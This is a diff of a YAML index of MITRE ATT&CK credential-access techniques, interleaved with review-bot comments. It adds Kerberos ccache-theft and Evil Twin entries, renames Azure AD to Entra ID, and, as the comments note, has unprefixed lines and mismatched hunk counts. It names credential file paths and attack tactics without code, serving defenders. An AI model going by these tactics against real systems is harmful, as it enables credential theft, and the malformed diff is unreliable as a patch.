+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
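Review bot: the new T1558.005 (Ccache Files) entry closes with `atomic_tests: []` and no `identifier: T1558.005` line, unlike T1558.004 which keeps `identifier: T1558.004`, so the same missing-key check applies here. Within its description, the lines `configuration`, `environment variable are used to set` and the two bare `,` lines carry no `+` prefix even though every surrounding line is an addition, and the text is split mid-sentence at exactly those points (`/etc/krb5.conf`, `KRB5CCNAME`, `kinit`, `klist`); as shown the hunk will not apply cleanly, so the source YAML should be checked for how those inline terms are wrapped. The entry also arrives with `x_mitre_detection: ''` and a description beginning with a literal `\n` and ending in a trailing space; these come from the upstream object, but a PR note that the empty detection field is intentional upstream data would save consumers from treating it as a generation error.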
@@ -44402,6 +45075,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44409,32 +45089,68 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests: []
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
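Review bot: the T1558 description in this hunk drops the Linux paragraph (the SSSD ccache copy in /var/lib/sss/secrets/secrets.ldb and its key .secrets.mkey) and the macOS ccache/KCM paragraph while the klist sentence stays, and the new `modified: '2024-09-17T19:49:11.455Z'` stamp says this came from upstream; please confirm the generator reproduced the upstream multi-line scalar verbatim rather than truncating it, because the surrounding description lines here carry no diff prefix and the header counts (32 old / 68 new) do not match the visible span. The citations those paragraphs used (MIT ccache, Linux Kerberos Tickets, Brining MimiKatz to Unix, Kekeo, SpectorOps Bifrost, macOS kerberos framework MIT) are removed from T1558's external_references in the following hunks, so description and reference list stay consistent with each other. Also note that T1558.004 loses `x_mitre_permissions_required: - User` with no replacement field.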
@@ -44470,7 +45186,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -44495,13 +45211,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
@@ -44510,14 +45219,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -44539,23 +45240,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
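Review bot: `spec_version: '2.1'` is removed from T1558 here, and the same removal is repeated for every other technique in this diff, with nothing taking its place; `spec_version` is a required common property on STIX 2.1 domain objects, so any consumer that validates these technique blocks as STIX will start rejecting them. If the index is only read by the project's own tooling that is acceptable, but the commit message should say so; otherwise keep the field in the generator output. The two reference removals above (Brining MimiKatz to Unix, Linux Kerberos Tickets) match the description paragraphs removed from T1558 in the first hunk.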
@@ -44606,12 +45298,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests: []
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -44623,6 +45314,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -44637,18 +45329,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
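Review bot: T1552's platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`, so any per-platform index or filter keyed on the old names will silently stop matching this technique; regenerate or remap those consumers in the same change. The relocated `x_mitre_modified_by_ref` line (and `x_mitre_attack_spec_version` in the previous hunk) now sit in alphabetical key order, while T1558.004 in the first hunk still emits those two keys after `object_marking_refs`, so two serialization orders coexist in one file; a fixed key order in the generator would keep future diffs of this index much smaller.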
@@ -44671,37 +45363,115 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ identifier: T1552
+ atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- identifier: T1552
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
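Review bot: this hunk both inserts the new sub-technique T1557.004 (Evil Twin) and re-homes T1552's closing keys: `identifier: T1552` / `atomic_tests: []` are added above the new block, while the old `spec_version: '2.1'` and `identifier: T1552` lines at the bottom are deleted, so the unchanged `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` context lines now belong to T1557.004 rather than T1552. That is only correct because T1552 gained those two keys in the earlier hunks; please load the regenerated YAML and check that every technique carries `x_mitre_attack_spec_version` exactly once and that `T1557.004` lands under `credential-access` with `atomic_tests: []` (it ships with an empty `x_mitre_detection: ''`, as upstream has it). In the T1556.007 text, leaving the backticked `AzureADConnectAuthenticationAgentService` untouched while `Azure AD` becomes `Entra ID` is right, since that token is a literal service identifier rather than product branding.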
@@ -44709,9 +45479,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -44720,21 +45490,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -44774,55 +45545,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -44852,6 +45578,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -44861,23 +45593,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
